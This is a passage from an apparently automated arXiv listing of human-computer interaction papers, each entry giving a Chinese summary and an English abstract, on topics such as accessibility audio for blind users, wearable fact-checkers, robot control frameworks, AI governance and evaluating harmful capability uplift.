【速读】:该论文旨在解决盲人及低视力(Blind and Low Vision, BLV)群体在场景感知中依赖口语描述但缺乏对远距离环境景观(Vista spaces)的沉浸式、愉悦性听觉表达的问题。其解决方案的关键在于提出Scene2Audio框架,该框架利用生成式模型(Generative Models)结合心理声学(Psychoacoustics)和场景音频构图原则,生成可理解且具美感的非语言音频信号,从而增强用户对环境的空间想象能力;实验表明,该音频与语音结合使用时显著优于纯语音描述,且移动端“野外”实证研究进一步验证了其在户外场景体验中的应用潜力。
链接: https://arxiv.org/abs/2603.27295
作者: Chitralekha Gupta,Jing Peng,Ashwin Ram,Shreyas Sridhar,Christophe Jouffrais,Suranga Nanayakkara
机构: Augmented Human Lab, National University of Singapore
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: Accepted in CHI 2026
Abstract:Current scene perception tools for Blind and Low Vision (BLV) individuals rely on spoken descriptions but lack engaging representations of visually pleasing distant environmental landscapes (Vista spaces). Our proposed Scene2Audio framework generates comprehensible and enjoyable nonverbal audio using generative models informed by psychoacoustics, and principles of scene audio composition. Through a user study with 11 BLV participants, we found that combining the Scene2Audio sounds with speech creates a better experience than speech alone, as the sound effects complement the speech making the scene easier to imagine. A mobile app “in-the-wild” study with 7 BLV users for more than a week further showed the potential of Scene2Audio in enhancing outdoor scene experiences. Our work bridges the gap between visual and auditory scene perception by moving beyond purely descriptive aids, addressing the aesthetic needs of BLV users.
[HC-37] Feeling the Facts: Real-time Wearable Fact-checkers Can Use Nudges to Reduce User Belief in False Information
【速读】:该论文旨在解决日常对话中虚假信息(misinformation)传播迅速且难以实时核实的问题,尤其是在缺乏时间进行验证的情境下。其解决方案的关键在于设计并验证一种可穿戴系统(wearable system),该系统通过环境监听(ambient listening)自动检测可验证的陈述,利用快速网络核查(rapid web verification)对信息真伪进行即时判断,并以微妙的触觉提示(haptic nudge)和直观的概览界面提供身体集成的反馈。实验表明,这种即时、嵌入式反馈显著提升了用户在实时情境下的真假辨别能力,并增加了主动核查行为,但也揭示了系统错误可能导致用户过度依赖的问题,从而为未来验证类可穿戴设备的设计提供了关于信任机制、认知负荷与人机协同关系的重要洞见。
链接: https://arxiv.org/abs/2603.27289
作者: Chitralekha Gupta,Nadia Victoria Aritonang,Dixon Prem Daniel Rajendran,Valdemar Danry,Pattie Maes,Suranga Nanayakarra
机构: National University of Singapore(新加坡国立大学); MIT Media Lab(麻省理工学院媒体实验室)
类目: Human-Computer Interaction (cs.HC)
备注: Accepted in ACM CHI 2026. *First two authors are equal contributors
Abstract:Misinformation can spread rapidly in everyday conversation, where pausing to verify is not always possible. We envision a wearable system that bridges the timing gap between hearing a claim and forming a judgment. It uses ambient listening to detect verifiable claims, performs rapid web verification, and provides a subtle haptic nudge with a glanceable overview. A controlled study (N=34) simulated this approach and tested against a no-support baseline. Results show that instant, body-integrated feedback significantly improved real-time truth discernment and increased verification activity compared to unsupported fact-checking. However, it also introduced over-reliance when the system made errors, i.e. failed to flag false claims or flagged true claims as false. We contribute empirical evidence of improved discernment alongside insights into trust, effort, and user-system tensions in verification wearables.
[HC-38] BrainRing: An Interactive Web-Based Tool for Brain Connectivity Chord Diagram Visualization
【速读】:该论文旨在解决脑功能连接(functional connectivity, FC)可视化工具依赖复杂配置文件或专有软件环境的问题,如Circos和BrainNet Viewer等传统工具在使用上存在门槛高、灵活性差、产出效率低等局限。其解决方案的关键在于开发了一个免费、开源、基于浏览器的交互式工具BrainRing,该工具无需安装、无后端服务器支持且不需编程知识,用户仅需打开一个HTML文件即可运行;它支持8种常用脑图谱,提供实时参数调整、边缘管理(包括点击连线、单边着色及Circos链接文件导入),并能快速生成高质量SVG/PNG图像,显著缩短了从数据到出版级图表的流程时间,实现了高效、灵活、易用的脑网络可视化。
链接: https://arxiv.org/abs/2603.27162
作者: Xiao Fan,Yi Zhang
机构: Xidian University(西安电子科技大学)
类目: Human-Computer Interaction (cs.HC); Graphics (cs.GR)
备注:
Abstract:Visualizing brain functional connectivity (FC) patterns is essential for understanding neural organization, yet existing tools such as Circos and BrainNet Viewer require complex configuration files or proprietary software environments. We present BrainRing, a free, open-source, browser-based interactive tool for generating publication-quality chord diagrams of brain connectivity data. BrainRing requires no installation, backend server, or programming knowledge. Users simply open a single HTML file in any modern browser. The tool supports 8 widely-used brain atlases (Brainnetome 246, AAL-90/116, Schaefer 100/200/400, Power 264, and Dosenbach 160), provides real-time parameter adjustment through an intuitive graphical interface, and offers comprehensive edge management including click-to-connect, per-edge color customization, and Circos link file import. BrainRing supports both Chinese and English interfaces and enables researchers to produce publication-ready SVG and PNG figures with full control over visual styling, all within seconds rather than the minutes-to-hours workflow typical of script-based approaches. BrainRing is freely available at this https URL with a live demo at this https URL.
[HC-39] Voice-based debate with an AI adversary is associated with increased divergent ideation
【速读】:该论文试图解决的问题是:当前关于生成式 AI(Generative AI)导致人类认知同质化的担忧,是否源于 AI 本身,还是与交互媒介的模态(如文本或语音)相关。解决方案的关键在于通过实证研究对比不同交互模态下的 discourse 结构特征——分析了 957 场大学生与知识型 AI 对手之间的开放式辩论,发现语音交互比文本交互更冗余但更具连贯性,且能支持更广泛的概念探索;而文本交互则更简洁但限制概念广度。这表明认知表现差异主要由媒介特性决定,而非 AI 系统本身。
链接: https://arxiv.org/abs/2603.27073
作者: Neelam Modi Jain,Dan J. Wang
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注: 16 pages, 1 figure, 1 table
Abstract:Concerns that interacting with generative AI homogenizes human cognition are largely based on evidence from text-based interactions, potentially conflating the effects of AI systems with those of written communication. This study examines whether these patterns depend on communication modality rather than on AI itself. Analyzing 957 open-ended debates between university students and a knowledgeable AI adversary, we show that modality corresponds to distinct structural patterns in discourse. Consistent with classic distinctions between orality and literacy, spoken interactions are significantly more verbose and exhibit greater repetition of words and phrases than text-based exchanges. This redundancy, however, is functional: voice users rely on recurrent phrasing to maintain coherence while exploring a wider range of ideas. In contrast, text-based interaction favors concision and refinement but constrains conceptual breadth. These findings suggest that perceived cognitive limitations attributed to generative AI partly reflect the medium through which it is accessed.
[HC-40] ROSClaw: An OpenClaw ROS 2 Framework for Agent ic Robot Control and Interaction
【速读】:该论文旨在解决当前机器人系统中基础模型(foundation model)与物理机器人集成时存在的耦合性问题,即现有方法将感知、执行和安全机制紧密绑定于单一模型与平台,导致灵活性差、可迁移性低。其解决方案的关键在于提出ROSClaw——一个模型无关的执行层(model-agnostic executive layer),通过动态能力发现与标准化 affordance 注入、多模态观测归一化、可配置安全边界内的预执行动作验证以及结构化审计日志等机制,实现任意基础模型与任意 ROS 2 兼容机器人之间的解耦交互。该设计使得模型后端或机器人平台更换仅需配置调整,而工具模式、安全约束和溯源记录保持不变,从而显著提升系统通用性与可复现性,并验证了执行层架构对任务完成率和安全性行为的决定性影响。
链接: https://arxiv.org/abs/2603.26997
作者: Irvin Steve Cardenas,Marcus Anthony Arnett,Natalie Catherine Yeo,Lucky Sah,Jong-Hoon Kim
机构: 未知
类目: Robotics (cs.RO); Human-Computer Interaction (cs.HC)
备注:
Abstract:Foundation models can endow robots with open-ended reasoning, language understanding, and adaptive planning, yet connecting a model to a physical robot today requires bespoke integration that couples perception, actuation, and safety to a single model and platform. We present ROSClaw, a model-agnostic executive layer that integrates the OpenClaw agent runtime with ROS 2, enabling any foundation model to perceive, reason about, and act on any ROS-enabled robot through (i) dynamic capability discovery with standardized affordance injection, (ii) multimodal observation normalization, (iii) pre-execution action validation within a configurable safety envelope, and (iv) structured audit logging. Swapping model backends or robot platforms is a configuration change; tool schemas, safety enforcement, and provenance logging remain invariant. We deploy ROSClaw on three platforms (wheeled, quadruped, humanoid) with four foundation-model backends. Under this controlled substrate, models exhibit up to 4.8 x differences in out-of-policy action proposal rates (3.4 x among frontier models alone) and produce qualitatively distinct physical behaviors from identical commands. A cross-framework parity protocol against ROSA confirms that executive-layer design, not just prompt wording, significantly affects both task completion and safety behavior, establishing ROSClaw as both practical agentic-robot infrastructure and a reproducible measurement instrument for embodied AI.
[HC-41] he Observability Gap: Why Output-Level Human Feedback Fails for LLM Coding Agents
【速读】:该论文试图解决的问题是:在生成式 AI (Generative AI) 编码系统中,如何通过人类反馈实现编码代理(coding agent)自主构建可复用函数库的能力,尤其是在仅依赖输出层视觉反馈的情况下是否可行。传统方法通常在设计时固定代理能力,而本文探索“ earned autonomy”( earned autonomy)机制——即代理从零预定义功能开始,通过轻量级人类反馈逐步积累功能库。其关键解决方案在于识别并缓解“反馈可观测性悖论”(feedback paradox),即由于代码逻辑与感知输出之间存在深层因果链,导致人类只能观察到结果(如3D场景渲染图),却难以定位内部错误根源,从而引发失败模式的持续震荡而非收敛。研究发现,引入最小限度的代码层面知识作为诊断干预后,系统实现了稳定收敛,证明主要瓶颈并非编程能力不足,而是反馈信息在结构上的不可观测性。因此,有效的人机协作需超越纯输出评估,增加中间层可观测性。
链接: https://arxiv.org/abs/2603.26942
作者: Yinghao Wang,Cheng Wang
机构: University of Cambridge (剑桥大学); University of East Anglia (东英吉利大学)
类目: Human-Computer Interaction (cs.HC)
备注: Accepted to CHI 2026 Workshop on Human-Agent Collaboration
Abstract:Large language model (LLM) multi-agent coding systems typically fix agent capabilities at design time. We study an alternative setting, earned autonomy, in which a coding agent starts with zero pre-defined functions and incrementally builds a reusable function library through lightweight human feedback on visual output alone. We evaluate this setup in a Blender-based 3D scene generation task requiring both spatial reasoning and programmatic geometric control. Although the agent rediscovered core utility functions comparable to a human reference implementation, it achieved 0% full-scene success under output-only feedback across multiple instruction granularities, where success required satisfying object completeness, ground contact, collision avoidance, and scale plausibility simultaneously. Our analysis identifies a structural observability gap: bugs originate in code logic and execution state, while human evaluation occurs only at the output layer, and the many-to-one mapping from internal states to visible outcomes prevents symptom-level feedback from reliably identifying root causes. This mismatch leads to persistent failure mode oscillation rather than convergence. A diagnostic intervention that injected minimal code-level knowledge restored convergence, strongly supporting the interpretation that the main bottleneck lies in feedback observability rather than programming competence. We formalize this phenomenon as a feedback paradox in domains with deep causal chains between internal code logic and perceptual outcomes, and argue that effective human-agent collaboration in such settings requires intermediate observability beyond output-only evaluation.
[HC-42] Mimetic Alignment with ASPECT: Evaluation of AI-inferred Personal Profiles
【速读】:该论文旨在解决当前AI代理在代表个体进行沟通时,难以准确捕捉个人独特沟通风格的问题。现有方法要么需要高昂的个性化微调(fine-tuning),要么生成泛化输出,或仅基于偏好优化而未建模实际沟通行为。其解决方案的关键在于提出ASPECT(Automated Social Psychometric Evaluation of Communication Traits)——一个无需个体训练即可利用工作场所行为数据自动评估通信特质的流水线,通过将大语言模型(LLM)与经过验证的沟通量表结合,从行为证据中提取可解释的个性特征,并支持用户对生成结果进行审查、校准和协商,从而构建可解释、个体化且可控的沟通画像。
链接: https://arxiv.org/abs/2603.26922
作者: Ruoxi Shang,Dan Marshall,Edward Cutrell,Denae Ford
机构: University of Washington (华盛顿大学); Microsoft Research (微软研究院)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: 20 pages (including appendix), 5 figures, 5 tables
Abstract:AI agents that communicate on behalf of individuals need to capture how each person actually communicates, yet current approaches either require costly per-person fine-tuning, produce generic outputs from shallow persona descriptions, or optimize preferences without modeling communication style. We present ASPECT (Automated Social Psychometric Evaluation of Communication Traits), a pipeline that directs LLMs to assess constructs from a validated communication scale against behavioral evidence from workplace data, without per-person training. In a case study with 20 participants (1,840 paired item ratings, 600 scenario evaluations), ASPECT-generated profiles achieved moderate alignment with self-assessments, and ASPECT-generated responses were preferred over generic and self-report baselines on aggregate, with substantial variation across individuals and scenarios. During the profile review phase, linked evidence helped participants identify mischaracterizations, recalibrate their own self-ratings, and negotiate context-appropriate representations. We discuss implications for building inspectable, individually scoped communication profiles that let individuals control how agents represent them at work.
[HC-43] Unlocking Open-Player-Modeling-enhanced Game-Based Learning: The Open Player Socially Analytical Intelligence Architecture
【速读】:该论文旨在解决游戏化学习(Game-Based Learning, GBL)中因学习者异质性导致的教学适应性难题,核心挑战在于如何实现透明、实时的开放玩家模型(Open Player Model, OPM),以支持个性化教学干预。解决方案的关键在于提出并实现了一个名为Open Player Socially Analytical Intelligence (OPSAI) 的架构,其创新性体现在三个方面:首先,将游戏运行数据采集与分析逻辑从游戏引擎中解耦,确保分析过程独立且可扩展;其次,通过三层结构设计(前端、无状态后端、双层日志存储)实现高效率的数据处理与低延迟查询,同时生成可操作的教学洞察(如反思提示、推荐和可视化引导);最后,将分析结果动态反馈至游戏界面,形成“游戏-学习”闭环,从而增强教师、研究者与学习者的三方参与度与透明度,为教育类游戏提供可复用的技术蓝图。
链接: https://arxiv.org/abs/2603.26915
作者: Zhiyu Lin,Boyd Fox,Devon Mckee,Sai Siddartha Maram,Jiahong Li,Tyler Sorensen,Brian K. Smith,Roger Azevedo,Jichen Zhu,Magy Seif El-Nasr
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: 8 pages, 3 figures
Abstract:Game-Based Learning (GBL) is a learner-engaging pedagogical methodology, yet adapting games to heterogeneous learners requires transparent, real-time Open Player Models (OPMs). We contribute to the community Open Player Socially Analytical Intelligence (OPSAI), an architecture implementing OPM beyond conceptual frameworks and validated in a GBL application. It decouples gameplay telemetry and analysis from the game engine and automatically derives pedagogically actionable insights, supporting the transparency of computational player models while making them accessible to players. OPSAI comprises three logical layers: a Frontend that both provides the GBL experience and collects information needed for analytics; a stateless Backend that hosts transparent analytics services producing reflective prompts, recommendations, and visualization guides; and a two-tier Log Storage that balances heavy raw gameplay data with lightweight reference indices for low-latency queries. By feeding analytics outputs back into the game interface, OPSAI closes the feedback loop between play and learning, empowering teachers, researchers, and learners alike. We further showcase OPSAI with a full deployment on the Parallel GBL environment, featuring live play traces, peer comparisons, and personalized suggestions, demonstrating a reusable blueprint for future educational games.
[HC-44] Unseen City Canvases: Exploring Blind and Low Vision Peoples Perspectives on Urban and Public Art Accessibility
【速读】:该论文旨在解决盲人及低视力(Blind and Low Vision, BLV)群体在城市公共艺术中的可访问性问题,这一领域长期被忽视,既缺乏针对城市环境的艺术探索研究,也缺少对多感官参与和文化意义传递的有效支持。解决方案的关键在于通过设计探针(design probes)结合生成式 AI (Generative AI) 生成的描述与实时交互技术,系统收集BLV用户对于发现和体验城市艺术的偏好,并提炼出七项设计维度以指导未来公共艺术无障碍设计,同时强调安全优先、多感官整合与文化准确性等核心挑战,推动人机交互(HCI)研究从导航扩展至更广泛的都市可达性范畴。
链接: https://arxiv.org/abs/2603.26909
作者: Lucy Jiang,Amy Seunghyun Lee,Jon E. Froehlich,Leah Findlater
机构: University of Washington (华盛顿大学)
类目: Human-Computer Interaction (cs.HC)
备注: Preprint
Abstract:Public art can hold cultural, social, political, and aesthetic significance, enriching urban environments and promoting well-being. However, a majority of urban art is inaccessible to blind and low vision (BLV) people. Most art access research has focused on private and curated settings (e.g., museums, galleries) and most urban access work has centered on outdoor navigation, leaving urban and public art accessibility largely understudied. We conducted semi-structured interviews with 16 BLV participants, using design probes featuring AI-generated descriptions and real-time AI interactions to investigate preferences for both discovering and engaging with urban art. We found that BLV people valued spontaneous art exploration, multisensory (e.g., tactile, auditory, olfactory) engagement, and detailed descriptions of culturally significant artwork. Participants also highlighted challenges distinct to urban art contexts: safety took precedence over art exploration, multisensory access measures could be disruptive to others in the public space, and inaccurate AI descriptions could lead to cultural erasure. Our contributions include empirical insights on BLV preferences for urban art discovery and engagement, seven design dimensions for public art access solutions, and implications for expanding HCI urban accessibility research beyond navigation.
[HC-45] KI-Adventskalender: An Informal Learning Intervention for Data AI Literacy
【速读】:该论文旨在解决中学生在接触生成式 AI (Generative AI) 系统时,难以理解其输出依赖于数据质量、评估选择与建模假设等核心概念的问题。为提供可及的切入点,研究者开发了 KI-Adventskalender —— 一个免费的基于网页的课外项目,通过在12月每日发布24个精心设计的微型挑战(micro-challenges),聚焦数据驱动能力与社会技术主题,引导学生实践性地理解数据解释的复杂性。其解决方案的关键在于:以日更微挑战的形式实现任务嵌套与渐进式学习路径,并结合平台行为数据与混合方法评估设计,识别用户参与度与认知掌握之间的差异,从而推动对持久学习效果的测量与改进。
链接: https://arxiv.org/abs/2603.26906
作者: Rahul Sharma,Lars Henrich,Larisa Ivanova,Arsalan Karimzadmotallebiazar,Annette Bieniusa,Leo Van Waveren,Sebastian Vollmer
机构: German Research Center for AI (DFKI GmbH); RPTU Kaiserslautern-Landau; Universität des Saarlandes
类目: Human-Computer Interaction (cs.HC)
备注: 8 pages, 5 figures
Abstract:Secondary school students increasingly encounter AI systems whose outputs depend on data quality, evaluation choices and modeling assumptions. To provide accessible entry points to these interconnected concepts, we developed KI-Adventskalender, a free web-based extracurricular initiative with 24 didactically curated, short, guided micro-challenges released daily in December, targeting data-centric competencies and socio-technical themes that shape how data are interpreted in practice. Drawing on two annual iterations, we report aggregate platform traces characterizing participation and task-level engagement. Participation increased substantially in 2025, but early attrition persists. Progression stabilized after midpoint: among users reaching Day 12 in 2025, more than 75% completed the calendar. Competence cluster performance shifted across years; higher revision rates co-occurred with strong pass rates, suggesting sustained engagement. We use these observations to motivate a next-step measurement agenda: tighter task instrumentation, embedded micro-assessments and mixed-method evaluation designs that can distinguish persistence from conceptual uptake, knowledge progression and durable learning outcomes.
[HC-46] A federated architecture for sector-led AI governance: lessons from India
【速读】:该论文旨在解决印度采用垂直、部门主导的生成式 AI (Generative AI) 治理策略所引发的政策碎片化风险,通过构建一个“全政府”(whole-of-government)治理架构来实现政策目标与实际落地之间的有效衔接。其解决方案的关键在于提出两个可操作的架构:一是明确关键机构在国家层面的治理职责分工;二是设计了一个基于联邦模式的全国人工智能事件管理架构,通过建立统一的国家标准,在保障各行业数据独立采集的同时,实现跨部门的数据整合与分析,从而破解数据孤岛问题,并为全球范围内类似治理模式提供可复制的实施路径。
链接: https://arxiv.org/abs/2603.26865
作者: Avinash Agarwal,Manisha J. Nene
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Human-Computer Interaction (cs.HC)
备注: 12 pages, 2 figures, 1 table. This is the author’s accepted manuscript of the article published as: Avinash Agarwal, Manisha J. Nene, “A federated architecture for sector-led AI governance: lessons from India”, Transforming Government: People, Process and Policy, 2026. Available at: this https URL
Abstract:Purpose: India has adopted a vertical, sector-led AI governance strategy. While promoting innovation, such a light-touch approach risks policy fragmentation. This paper aims to propose a cohesive “whole-of-government” architecture to mitigate these risks and connect policy goals with a practical implementation plan. Design/methodology/approach: The paper applies an established five-layer conceptual framework to the Indian context. First, it constructs a national architecture for overall governance. Second, it uses a detailed case study on AI incident management to validate and demonstrate the architecture’s practical utility in designing a specific, operational system. Findings: The paper develops two actionable architectures. The primary model assigns clear governance roles to India’s key institutions. The second is a detailed, federated architecture for national AI Incident Management. It addresses the data silo problem by using a common national standard that allows sector-specific data collection while facilitating cross-sectoral analysis. Practical implications: The proposed architectures offer a clear and predictable roadmap for India’s policymakers, regulators and industry to accelerate the national AI governance agenda. Social implications: By providing a systematic path from policy to practice, the architecture builds public trust. This structured approach ensures accountability and aligns AI development with societal values. Originality/value: This paper proposes a detailed operational architecture for India’s “whole-of-government” approach to AI. It offers a globally relevant template for any nation pursuing a sector-led governance model, providing a clear implementation plan. Furthermore, the proposed federated architecture demonstrates how adopting common standards can enable cross-border data aggregation and global sectoral risk analysis without centralising control.
[HC-47] he Cognitive Divergence: AI Context Windows Human Attention Decline and the Delegation Feedback Loop
【速读】:该论文旨在解决人工智能(AI)在处理上下文信息能力上的指数级增长与人类持续注意力容量的长期下降之间形成的“认知分歧”(Cognitive Divergence)问题。其核心问题是:随着大语言模型(LLM)上下文窗口从2017年的512 tokens扩展至2026年的2,000,000 tokens(年增长率约59%),人类有效上下文跨度(Effective Context Span, ECS)却从2004年的约16,000 tokens降至2026年估计的1,800 tokens,导致AI与人类在认知能力上的差距急剧扩大。解决方案的关键在于提出“委托反馈循环”(Delegation Feedback Loop)假说——即随着AI能力增强,人类将越来越多低复杂度任务交由AI完成,进而减少自身认知实践,进一步削弱本已下降的认知能力;该机制解释了为何这一趋势难以自发逆转,并据此提出以验证过的ECS心理测量工具为基础、开展纵向研究以追踪AI介导下的认知变化的研究议程。
链接: https://arxiv.org/abs/2603.26707
作者: Netanel Eliav(Machine Human Intelligence Lab)
机构: Machine Human Intelligence Lab (MHIL)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Computers and Society (cs.CY); Human-Computer Interaction (cs.HC); Neurons and Cognition (q-bio.NC)
备注: 28 pages, 1 figure, 5 tables. Preprint, not peer reviewed
Abstract:This paper documents and theorises a self-reinforcing dynamic between two measurable trends: the exponential expansion of large language model (LLM) context windows and the secular contraction of human sustained-attention capacity. We term the resulting asymmetry the Cognitive Divergence. AI context windows have grown from 512 tokens in 2017 to 2,000,000 tokens by 2026 (factor ~3,906; fitted lambda = 0.59/yr; doubling time ~14 months). Over the same period, human Effective Context Span (ECS) – a token-equivalent measure derived from validated reading-rate meta-analysis (Brysbaert, 2019) and an empirically motivated Comprehension Scaling Factor – has declined from approximately 16,000 tokens (2004 baseline) to an estimated 1,800 tokens (2026, extrapolated from longitudinal behavioural data ending 2020 (Mark, 2023); see Section 9 for uncertainty discussion). The AI-to-human ratio grew from near parity at the ChatGPT launch (November 2022) to 556–1,111x raw and 56–111x quality-adjusted, after accounting for retrieval degradation (Liu et al., 2024; Chroma, 2025). Beyond documenting this divergence, the paper introduces the Delegation Feedback Loop hypothesis: as AI capability grows, the cognitive threshold at which humans delegate to AI falls, extending to tasks of negligible demand; the resulting reduction in cognitive practice may further attenuate the capacities already documented as declining (Gerlich, 2025; Kim et al., 2026; Kosmyna et al., 2025). Neither trend reverses spontaneously. The paper characterises the divergence statistically, reviews neurobiological mechanisms across eight peer-reviewed neuroimaging studies, presents empirical evidence bearing on the delegation threshold, and proposes a research agenda centred on a validated ECS psychometric instrument and longitudinal study of AI-mediated cognitive change.
[HC-48] Bridging the Awareness Gap: Socially Mediated State Externalization for Transparent Distributed Home Robots IROS2026
【速读】:该论文旨在解决分布式家庭机器人系统中因机器人处于用户视线之外而导致的状态感知鸿沟问题,这种鸿沟会削弱用户的信任感、透明度感知和控制感。解决方案的关键在于引入一个共处的社交中介机器人(Pepper),通过实时、社会化的状态外化机制,将不可见移动操作机器人(Stretch 3)的任务执行状态以语音更新和可视化进度的方式同步呈现给用户,从而在不牺牲任务性能的前提下显著提升用户体验与系统可信度。
链接: https://arxiv.org/abs/2603.26686
作者: Wenzheng Zhao,Manideep Duggi,Fengpei Yuan
机构: Worcester Polytechnic Institute (伍斯特理工学院)
类目: Robotics (cs.RO); Human-Computer Interaction (cs.HC)
备注: 9 pages, 7 figures, 6 tables. Under review for IROS 2026
Abstract:Distributed multi-robot systems for the home often require robots to operate out of the user’s sight, creating a state awareness gap that can diminish trust and perceived transparency and control. This paper investigates whether real-time, socially mediated state externalization can bridge this gap without compromising task performance. We developed a system where a co-located social mediator robot (Pepper) externalizes the hidden execution states of an out-of-sight mobile manipulator (Stretch~3) for voice-driven object retrieval and delivery, where task-level states are synchronized and externalized through verbal updates and visual progress display. In a counterbalanced within-subject study (N=30), we compared a baseline of Autonomous Hidden Execution against Socially Mediated State Externalization. Our results show that externalization significantly increases user task-focused attention (from 15.8% to 84.6%, p.001) and substantially improves perceived perspicuity, dependability, stimulation, and attractiveness (all p.001). Furthermore, 83% of participants preferred the externalized condition, and this improvement in user experience was achieved without a statistically significant increase in end-to-end task completion time (p=.271). The results suggest that socially mediated state externalization is an effective architectural mechanism for designing more transparent and trustworthy distributed robot systems, ultimately enhancing user experience without sacrificing performance in distributed home robot deployments.
[HC-49] Operationalizing Perceptions of Agent Gender: Foundations and Guidelines
【速读】:该论文试图解决当前研究中关于智能体(intelligent agents)性别感知的测量标准缺失问题,即缺乏统一的定义、标注与测量方法,导致研究结果难以比较和整合。其解决方案的关键在于提出一个系统构建且理论驱动的元层级框架(meta-level framework),旨在提供操作上的清晰性与实践指导,从而提升研究的严谨性和包容性,并打破性别二元模型的局限及隐含的人类中心主义偏见。
链接: https://arxiv.org/abs/2603.26682
作者: Katie Seaborn,Madeleine Steeds,Ilaria Torre,Martina De Cet,Katie Winkle,Marcus Göransson
机构: Institute of Science Tokyo(东京科学研究所); University of Cambridge(剑桥大学); University College Dublin(都柏林大学); Chalmers University of Technology and University of Gothenburg(查尔姆斯理工大学和哥德堡大学); Uppsala University(乌普萨拉大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注:
Abstract:The “gender” of intelligent agents, virtual characters, social robots, and other agentic machines has emerged as a fundamental topic in studies of people’s interactions with computers. Perceptions of agent gender can help explain user attitudes and behaviours – from preferences to toxicity to stereotyping – across a variety of systems and contexts of use. Yet, standards in capturing perceptions of agent gender do not exist. A scoping review was conducted to clarify how agent gender has been operationalized – labelled, defined, and measured – as a perceptual variable. One-third of studies manipulated but did not measure agent gender. Norms in operationalizations remain obscure, limiting comprehension of results, congruity in measurement, and comparability for meta-analyses. The dominance of the gender binary model and latent anthropocentrism have placed arbitrary limits on knowledge generation and reified the status quo. We contribute a systematically-developed and theory-driven meta-level framework that offers operational clarity and practical guidance for greater rigour and inclusivity.
[HC-50] AI Meets Mathematics Education: A Case Study on Supporting an Instructor in a Large Mathematics Class with Context-Aware AI
【速读】:该论文旨在解决大规模高校课程中难以提供及时且可扩展的教学支持这一持续性难题。其解决方案的关键在于构建一个以用户为中心的、与授课教师紧密协作的AI辅助支持系统,通过在2,588条历史师生互动数据上微调轻量级语言模型,使AI能够准确回答学生在讨论区提出的问题;该模型在150个代表性问题上的基准测试中达到75.3%的准确率,并在36%的情况下被五位教师评价为等同或优于教师答案,同时结合混合人-AI工作流保障教学内容的安全性和有效性。
链接: https://arxiv.org/abs/2603.26679
作者: Jérémy Barghorn,Anna Sotnikova,Sacha Friedli,Antoine Bosselut
机构: École polytechnique fédérale de Lausanne(洛桑联邦理工学院)
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Human-Computer Interaction (cs.HC)
备注:
Abstract:Large-enrollment university courses face persistent challenges in providing timely and scalable instructional support. While generative AI holds promise, its effective use depends on reliability and pedagogical alignment. We present a human-centered case study of AI-assisted support in a Calculus I course, implemented in close collaboration with the course instructor. We developed a system to answer students’ questions on a discussion forum, fine-tuning a lightweight language model on 2,588 historical student-instructor interactions. The model achieved 75.3% accuracy on a benchmark of 150 representative questions annotated by five instructors, and in 36% of cases, its responses were rated equal to or better than instructor answers. Post-deployment student survey (N = 105) indicated that students valued the alignment of the responses with the course materials and their immediate availability, while still relying on the instructor verification for trust. We highlight the importance of hybrid human-AI workflows for safe and effective course support.
[HC-51] Evaluating Human-AI Safety: A Framework for Measuring Harmful Capability Uplift
【速读】:该论文试图解决当前AI安全评估过于依赖静态基准测试、第三方标注和红队测试,而忽视了用户实际能力提升带来的潜在风险问题。其解决方案的关键在于提出“有害能力提升”(harmful capability uplift)作为核心AI安全度量指标,即衡量用户在使用前沿模型后相较于传统工具所能增强的造成危害的能力边际增长,并基于社会科学研究提供系统性测量方法,推动开发者、研究者、资助方和监管机构将该评估纳入标准实践。
链接: https://arxiv.org/abs/2603.26676
作者: Michelle Vaccaro,Jaeyoon Song,Abdullah Almaatouq,Michiel A. Bakker
机构: Massachusetts Institute of Technology (麻省理工学院)
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Human-Computer Interaction (cs.HC)
备注:
Abstract:Current frontier AI safety evaluations emphasize static benchmarks, third-party annotations, and red-teaming. In this position paper, we argue that AI safety research should focus on human-centered evaluations that measure harmful capability uplift: the marginal increase in a user’s ability to cause harm with a frontier model beyond what conventional tools already enable. We frame harmful capability uplift as a core AI safety metric, ground it in prior social science research, and provide concrete methodological guidance for systematic measurement. We conclude with actionable steps for developers, researchers, funders, and regulators to make harmful capability uplift evaluation a standard practice.
[HC-52] Co-designing a Social Robot for Newcomer Childrens Cultural and Language Learning
【速读】:该论文旨在解决新移民儿童在习得东道国语言及参与读写课程时面临的障碍问题,这些问题常因师资不足、学生语言能力混杂以及接触时间有限而加剧。研究提出的关键解决方案是通过与项目导师和协调员的共同设计(co-design)方法,探索社会助教机器人(Socially Assistive Robot, SAR)在这一敏感社会情感环境中的应用潜力。其核心在于基于专家经验提炼出四大典型挑战、探讨机器人在文化适应与社区归属感建构中的作用,并提出初步的设计指南,为将SAR整合进课堂提供可迭代优化的框架。
链接: https://arxiv.org/abs/2603.26674
作者: Neil Fernandes,Tehniyat Shahbaz,Emily Davies-Robinson,Yue Hu,Kerstin Dautenhahn
机构: University of Waterloo (滑铁卢大学); United for Literacy (联合识字组织)
类目: Robotics (cs.RO); Computers and Society (cs.CY); Human-Computer Interaction (cs.HC)
备注: In proceedings of the 21st ACM/IEEE International Conference on Human-Robot Interaction (HRI 2026)
Abstract:Newcomer children face barriers in acquiring the host country’s language and literacy programs are often constrained by limited staffing, mixed-proficiency cohorts, and short contact time. While Socially Assistive Robots (SARs) show promise in education, their use in these socio-emotionally sensitive settings remains underexplored. This research presents a co-design study with program tutors and coordinators, to explore the design space for a social robot, Maple. We contribute (1) a domain summary outlining four recurring challenges, (2) a discussion on cultural orientation and community belonging with robots, (3) an expert-grounded discussion of the perceived role of an SAR in cultural and language learning, and (4) preliminary design guidelines for integrating an SAR into a classroom. These expert-grounded insights lay the foundation for iterative design and evaluation with newcomer children and their families.
[HC-53] Statistics 101 201 and 202: Three Shiny Apps for Teaching Probability Distributions Inferential Statistics and Simple Linear Regression
